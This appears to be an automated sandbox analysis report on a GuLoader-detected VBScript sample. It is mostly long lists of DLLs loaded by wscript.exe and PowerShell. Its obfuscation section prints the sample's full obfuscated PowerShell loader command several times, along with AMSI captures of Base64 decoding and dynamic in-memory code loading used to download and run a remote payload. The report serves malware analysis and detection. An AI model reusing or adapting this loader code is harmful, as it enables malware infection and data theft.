              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: stem.Core.pdbTE source: powershell.exe, 00000006.00000002.2671367789.0000000007E15000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdb source: powershell.exe, 00000006.00000002.2671367789.0000000007E15000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000006.00000002.2671367789.0000000007E15000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("Powershell " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementer", "0")
              Yara detected GuLoader
              Source: Yara matchFile source: 00000006.00000002.2673783211.00000000097DB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2673637961.0000000008380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2659683449.000000000569C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1518070240.000002D2E0D12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Triclinium)$GLOBAl:pERVAsION = [SysTeM.TEXT.eNCODIng]::Ascii.GetSTRING($tragikErE)$GlOBAl:NeWFoUnDlNDErS=$PerVaSIOn.SubStRIng($GROOverhEAd,$QUADRicyCLeR)<#Royals Fjsene Guarantine #>
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Preracing $Vanetnkningernesescabrrestordrens $Forladerne155), (Stereodeck @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Bechirp = [AppDomain]::CurrentDom
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Nigrosins)), $Grassmen).DefineDynamicModule($Twattler, $false).DefineType($Micros, $Beholdningens, [System.MulticastDelegate])$Scholas
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Triclinium)$GLOBAl:pERVAsION = [SysTeM.TEXT.eNCODIng]::Ascii.GetSTRING($tragikErE)$GlOBAl:NeWFoUnDlNDErS=$PerVaSIOn.SubStRIng($GROOverhEAd,$QUADRicyCLeR)<#Royals Fjsene Guarantine #>
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$c
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$c
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$cJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE7CEC00BD pushad ; iretd 4_2_00007FFE7CEC00C1
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
